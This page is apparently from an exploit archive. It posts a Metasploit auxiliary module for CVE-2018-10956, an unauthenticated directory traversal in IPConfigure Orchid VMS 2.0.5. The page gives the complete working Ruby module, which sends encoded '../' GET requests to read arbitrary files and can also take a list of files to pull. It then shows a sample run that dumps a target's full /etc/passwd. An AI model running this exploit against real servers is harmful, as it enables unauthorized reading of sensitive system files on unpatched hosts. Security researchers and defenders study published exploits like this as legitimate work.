Twenty Year Anniversary

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure
Posted Jun 21, 2018
Authored by Sanjiv Kawa | Site metasploit.com

Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read. This Metasploit module was tested against 2.0.5. This has been fixed in 2.0.6.

tags | exploit, remote, web, arbitrary, file inclusion
systems | linux, windows
advisories | CVE-2018-10956
MD5 | 3e04a3dc073e0a19729151e34ab842cb

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure

Change Mirror Download
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',
'Description' => %q{
Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read.

This module was tested against 2.0.5. This has been fixed in 2.0.6.
},
'Author' => [ 'Sanjiv Kawa @kawabungah' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-10956' ],
[ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],
[ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]
],
'DisclosureDate' => 'May 7, 2018'))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),
OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']),
OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']),
Opt::RPORT(80)
], self.class )
end

def init_request(path)
res = send_request_cgi({
'method' => 'GET',
'uri' => path
})

return res
end

def run
path = normalize_uri(target_uri.path)
res = init_request(path)

if res && res.code == 200
file = Array.new
trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"


if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?
file = [datastore['FILE']]
else
file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines
end

for i in 0 .. file.length - 1
path = normalize_uri(target_uri.path) + trigger + file[i]
res = init_request(path)

if res.code == 200
print_good("Obtained #{datastore['FILE']}")
puts res.body
puts ""
else
print_error("#{datastore['FILE']} does not exist")
puts res.body
puts ""
end
end
else
print_error("Web Server is Unresponsive")
end
end
end
__END__
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options

Module options (auxiliary/scanner/http/orchid_core_vms_directory_traversal):

Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd yes This is the file to download
INPUTFILE no Specify a list of files to downloads
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.100.100.100 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to Orchid VMS
VHOST no HTTP server virtual host

msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run

[+] Obtained /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close